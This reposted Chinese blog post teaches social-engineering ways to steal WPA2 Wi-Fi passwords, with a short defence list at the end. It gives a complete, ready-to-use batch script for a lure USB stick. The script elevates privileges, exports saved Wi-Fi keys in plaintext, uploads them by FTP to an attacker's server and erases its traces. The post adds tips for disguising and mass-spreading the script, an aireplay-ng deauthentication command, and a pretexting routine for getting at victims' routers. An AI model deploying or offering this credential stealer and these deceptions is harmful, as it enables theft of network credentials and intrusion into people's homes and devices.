常见社工破解WPA2密码方法及防范措施
0×00前言
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ip>C:\config.txt echo user 账号>>C:\config.txt echo 密码>>C:\config.txt echo mput c:\win\*.xml>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo yes>>C:\config.txt echo bye>>C:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
打开此脚本
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
查看ftp服务器
wifi信息已经put上来了
进入服务器打开一个xml文件
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用网络)对受害者使用断网攻击,等一小时后去敲门,询问网络是否故障,询问网络是哪家公司配置的,然后声称自己的网络也故障了,是一样的公司,然后询问报修电话并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复网络的假象,然后撤退。
2.结合移动存储攻击,配合badusb,谎称有重要文件需要发送然而手机没电了,家里人还没下班。第一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badusb,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi最好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.最好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
转载于:https://www.cnblogs.com/h2zZhou/p/9153925.html
常见社工破解WPA2密码方法及防范措施相关推荐
- 社会工程学与APT攻击之——社工防御方法
社工防御方法 今天学习的没什么特别的,主要是一些安全意识吧,现在我见着二维码都不敢乱扫,网站不是用https我都不进,群里发的工具链接不敢点 还学了六七种APT挂马小工具的使用,就不发出来了哈,怕CS ...
- 使用AirCrack破解wifi密码(wpa/wpa2)
本文使用的是Kali Linux,该系统主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook,看这里:使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Li ...
- 强力破解E-mail密码三种方法(转)
强力破解E-mail密码三种方法(转)[@more@] 电子邮件并不是安全的,在邮件的发送.传送和接收整个过程中的每个环节都可能存在薄弱环节,恶意用户如果利用其漏洞,就能够轻易的破解出账号,获得邮件内 ...
- 2023 年破解 PDF 密码的 5 种最佳方法
世界越来越依赖数字文档和信息存储.最流行和广泛使用的数字文档文件格式之一是便携式文档格式 (PDF).PDF 文件用途广泛.可靠,并提供高级别的安全性以保护敏感信息免遭未经授权的访问.保护 PDF 的 ...
- 社工库网址与制作方法
将互联网泄露的信息汇聚成数据库,简单说:黑客数据库. 中国执行信息公开网 http://zxgk.court.gov.cn/?dt_dapp=1 全国标准信息公共服务平台 http://std.sam ...
- XP系统常用的登录密码方法破解(一共9种)
其实不然,我们有很多种方法来破解系统登录密码.下面笔者介绍其中的9种常用方法! 从"控制面板"中找到"用户账户"项,选中自己的账户进入如图所示的控制界面,我们可 ...
- 网络密码破解的十个方法
个人网络密码安全是整个网络安全的一个重要环节,如果个人密码遭到黑客破解,将引起非常严重的后果,例如网络银行的存款被转账盗用,网络游戏内的装备或者财产被盗,QQ币被盗用等等,增强网民的网络安全意识是网络 ...
- 计算机触摸屏维修,工控触摸屏常见的故障问题和维修方法分别是什么
工控触摸屏常见的故障问题和维修方法分别是什么 需要理论基础和实践操作的累积 我想了解下工控触摸屏哪个好 我们在用的一种工控触摸屏目前运行稳定,是用在自动售货机上的.参数发给你你可以参考下: CPU处理 ...
- ubuntu破解密码方法
摘要: 开机按住任何键(shift)停住grub菜单,进入advanced option for ubuntu,出现的菜单中,光标移动至-(recovery mode)按E进入编辑,找到ro reco ...
最新文章
- 简单介绍python format格式化和数字格式化
- php 读取excel转html,PHPExcel 转HTML
- 拿下赌场新客户,但马斯克“超级隧道”何时才能颠覆地面交通?
- iOS 学习 - 13.微信分享链接、QQ 分享图片
- 网页布局设计的标准尺寸
- 移动设计需避免四种常见的用户体验失败
- java到android_Java到Android?
- 2017.3.29 报表统计 思考记录
- vscode :常用快捷操作
- Linux chmod文件授权命令
- 三星q90 回音壁最新固件1010.5升级教程
- 中国邮递员问题的深入剖析与算法实现(附例题及MATLAB、LINGO代码)
- 程序设计基本结构———顺序、选择与循环
- 5-2 jmu-java-m05-自定义Judgeable接口 (10分)
- uniapp启动页面
- OpenGL学习例程精析(3d纹理)
- 《用 Python 学微积分》笔记 3
- uClinux 启动过程详细分析
- 华为有国产芯片的服务器吗,华为、飞腾扛旗,国产服务器芯片有望突破!ARM要替代x86?...
- H3C服务器重做RAID
热门文章
- Netty 全网最详细的教程! 没有之一!
- 狂神JUC八种锁的理解
- 三种Statement类
- android beam传输速率,S Beam让分享变得更简单
- 接口测试 总结(什么是接口测试)
- php 文件 byte数组,php实现java的byte数组转换
- SVN上传文件,提示副本:XXX被锁定,请执行“清理”
- 看完95后阿里p7的工资,觉得自己这两年工作了个寂寞
- 大学里“最后悔”排行榜!你有没有中?
- Ubuntu 上使用的下载工具,不是只有迅雷(又不好用)FireDM